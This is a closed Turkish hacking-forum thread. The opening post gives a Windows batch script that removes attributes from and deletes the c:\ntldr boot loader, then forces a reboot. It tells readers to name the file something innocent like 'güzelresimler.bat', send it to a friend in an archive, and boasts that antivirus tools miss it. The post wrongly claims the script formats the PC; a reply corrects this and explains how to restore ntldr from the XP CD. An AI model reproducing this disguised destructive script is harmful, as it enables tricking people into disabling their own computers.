%90 antivirüslerin bulamadığı kodlar ile pc çökertme{olayyy}

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

haburta

New member
KODLAR AŞADA

Bildiğimiz gibi bazı kodlar bilgisayara küçük orta zararlar verir bazıları büyük zarar verebilir
Ve vereceğim kod büyük zarar verior
%90 AntiVirü'lere takılmıyor bu kod.Fakat msn de bazen ama bazen takılıyor.
Nasıl Yedire Bilirsiniz?
İlkden arkadaşınız ko cu ise veya başka ise benimki ko cu idi.

Ben:ko da gm olma kodunu buldum(ko cu ise)
Ark:nasıl versene (ko cu ise kesin yer yemesse diyorsanız item ve lwl kodu diin)
Ben: bak dediklerimi yap not defterni aç için şu kodları kopyala kod......... sonra kapat .txt yi sil .bat yap sonra istedin yere kaydet kaydettin yerden yeniden aç
Ark:20 saniye geri gidiyor
20 saniye sonra oturum kapandı ve dll eksik hatası veriyor

ANLAMAYANLARA ANLATIM:

İşte kodlar:

cd..

cd..

attrib -s -h -r -a c:\ntldr

del c:\ntldr

shutdown -r

Arkadaşlar bu kodları bilgisayarımızdaki notpadi açarak içerisine kopyalıyoruz ve dosyayı kaydederken uzantısını .bat olarak değiştiriyoruz. sakın olaki dosyayı kendiniz açmayın!!!

örneğin; güzelresimler.bat

sonra işin heyecanlı kısmına gelelim. dosyamızı winrar yada winzip gibi programlar aracılığıyla karşı tarafa yolluyoruz. ve karşı taraf bu dosyayı açtığında boooom!!!! pc kendine otomatik format çeker.

haaa olaki dosyayı kendiniz yanlışlıkla açtınız olsun önemli deil; ben size bunun panzehirinide veriyimde içiniz rahatlısın.

yukarıdaki gibi hazırlamış olduğumuz dosya açıldığında 30 saniyelik bir geri sayma işlemi başlar forrmat işlemi için. bu 30 saniye bitmeden aşağıda verdiğim kodları yine aynı şekilde bat olarak kaydedip açtığınızda format işlemi duruyo. ama siz yinede denemeyin ne olur ne olmaz o kadar riske girmeyin..

panzehir kodları;

shutdown -a

kolay gelsin. bi teşekkürü borç bilin...:
Veilmişse mod s mod ve admin arkadaşlarım ve üstlerimden çok özür diliyorum ben bulamadım bunun gibisini forumda verdim:aşk

selamsiz

New member
arkdaş bu format çekmiyor sadece sistemin açılması için gerekli ntldr dosyasını siliyor...Bunun panzehirini söyleyeyim...
winxp cd sini takın
x = cd sürücü
copy x:\ntldr c:\

dediğinizde ntldr ı c ye kopyalar ve sorun çözülmüş olur..maximum 5 dknızı alır geri çevirmek...

ergen46

New member
eskide kaldı bunlar bat dosyası ile adama gonderme adam depfez kullanıyorsa hec bir ise yaramacak:D

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

HTML